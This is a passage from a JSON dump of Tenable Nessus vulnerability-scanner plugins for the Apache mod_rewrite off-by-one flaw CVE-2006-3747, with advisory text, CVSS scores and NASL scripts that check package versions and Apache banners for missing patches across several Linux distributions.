exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:00", "description": "This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2007-01-17T00:00:00", "title": "Fedora Core 4 : httpd-2.0.54-10.4 (2006-862)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2007-01-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", "p-cpe:/a:fedoraproject:fedora:mod_ssl"], "id": "FEDORA_2006-862.NASL", "href": "https://www.tenable.com/plugins/nessus/24161", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-862.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24161);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-862\");\n\n script_name(english:\"Fedora Core 4 : httpd-2.0.54-10.4 (2006-862)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-July/000462.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dbd04221\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"httpd-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"httpd-debuginfo-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"httpd-devel-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"httpd-manual-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mod_ssl-2.0.54-10.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:20:49", "description": "The remote host appears to be running a version of Apache which is\nolder than 1.3.37. \n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.", "edition": 28, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2008-03-26T00:00:00", "title": "Apache < 1.3.37 mod_rewrite LDAP Protocol URL Handling Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_1_3_37.NASL", "href": "https://www.tenable.com/plugins/nessus/31654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(31654);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_bugtraq_id(19204);\n script_xref(name:\"EDB-ID\", value:\"3680\");\n \n script_name(english:\"Apache < 1.3.37 mod_rewrite LDAP Protocol URL Handling Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote version of Apache is vulnerable to an off-by-one buffer\noverflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Apache which is\nolder than 1.3.37. \n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jul/671\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive//443870\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.3.37 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/03/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/07/28\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n summary[\"english\"] = \"Checks for version of Apache\";\n \n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, 'Apache');\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokesn Major/Minor\n# was used\n\nif (version =~ '^1(\\\\.3)?$') audit(AUDIT_VER_NOT_GRANULAR, 'Apache', port, version);\nif (version !~ \"^\\d+(\\.\\d+)*$\") audit(AUDIT_NONNUMERIC_VER, 'Apache', port, version);\nif (version =~ '^1\\\\.3' && ver_compare(ver:version, fix:'1.3.37') == -1)\n{\n if (report_paranoia > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.37\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:20:50", "description": "The remote host appears to be running a version of Apache that is older \nthan 2.0.59.\n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.", "edition": 29, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2008-03-26T00:00:00", "title": "Apache < 2.0.59 mod_rewrite LDAP Protocol URL Handling Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_0_59.NASL", "href": "https://www.tenable.com/plugins/nessus/31655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(31655);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_bugtraq_id(19204);\n \n script_name(english:\"Apache < 2.0.59 mod_rewrite LDAP Protocol URL Handling Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote version of Apache is vulnerable to an off-by-one buffer\noverflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Apache that is older \nthan 2.0.59.\n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jul/671\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.0\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.0.59 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/03/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/07/28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\nscript_end_attributes();\n\n \n script_summary(english:\"Checks for version of Apache\");\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache\");\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nif (version =~ '^2(\\\\.0)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\nif (version !~ \"^\\d+(\\.\\d+)*$\") exit(1, \"The version of Apache listening on port \" + port + \" - \" + version + \" - is non-numeric and, therefore, cannot be used to make a determination.\");\nif (version =~ '^2\\\\.0' && ver_compare(ver:version, fix:'2.0.59') == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.0.59\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200608-01\n(Apache: Off-by-one flaw in mod_rewrite)\n\n An off-by-one flaw has been found in Apache's mod_rewrite module by\n Mark Dowd of McAfee Avert Labs. This flaw is exploitable depending on\n the types of rewrite rules being used.\n \nImpact :\n\n A remote attacker could exploit the flaw to cause a Denial of Service\n or execution of arbitrary code. Note that Gentoo Linux is not\n vulnerable in the default configuration.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "published": "2006-08-04T00:00:00", "title": "GLSA-200608-01 : Apache: Off-by-one flaw in mod_rewrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200608-01.NASL", "href": "https://www.tenable.com/plugins/nessus/22143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-01.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22143);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"GLSA\", value:\"200608-01\");\n\n script_name(english:\"GLSA-200608-01 : Apache: Off-by-one flaw in mod_rewrite\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-01\n(Apache: Off-by-one flaw in mod_rewrite)\n\n An off-by-one flaw has been found in Apache's mod_rewrite module by\n Mark Dowd of McAfee Avert Labs. This flaw is exploitable depending on\n the types of rewrite rules being used.\n \nImpact :\n\n A remote attacker could exploit the flaw to cause a Denial of Service\n or execution of arbitrary code. Note that Gentoo Linux is not\n vulnerable in the default configuration.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/Announcement2.0.html\"\n );\n # http://www.apache.org/dist/httpd/Announcement1.3.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a26cbb9f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose www-servers/apache\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"rge 1.3.34-r14\", \"rge 1.3.37\", \"ge 2.0.58-r2\"), vulnerable:make_list(\"lt 2.0.58-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:17", "description": "New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, and -current to fix a security issue with mod_rewrite.", "edition": 25, "published": "2006-08-04T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 8.1 / 9.0 / 9.1 / current : Apache httpd (SSA:2006-209-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "p-cpe:/a:slackware:slackware_linux:apache", "p-cpe:/a:slackware:slackware_linux:mod_ssl"], "id": "SLACKWARE_SSA_2006-209-01.NASL", "href": "https://www.tenable.com/plugins/nessus/22152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-209-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22152);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"SSA\", value:\"2006-209-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 8.1 / 9.0 / 9.1 / current : Apache httpd (SSA:2006-209-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, and -current to fix a security issue with mod_rewrite.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdfa00c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\nif (slackware_check(osver:\"8.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\nif (slackware_check(osver:\"9.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\nif (slackware_check(osver:\"9.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\nif (slackware_check(osver:\"10.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\nif (slackware_check(osver:\"10.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\nif (slackware_check(osver:\"10.2\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": 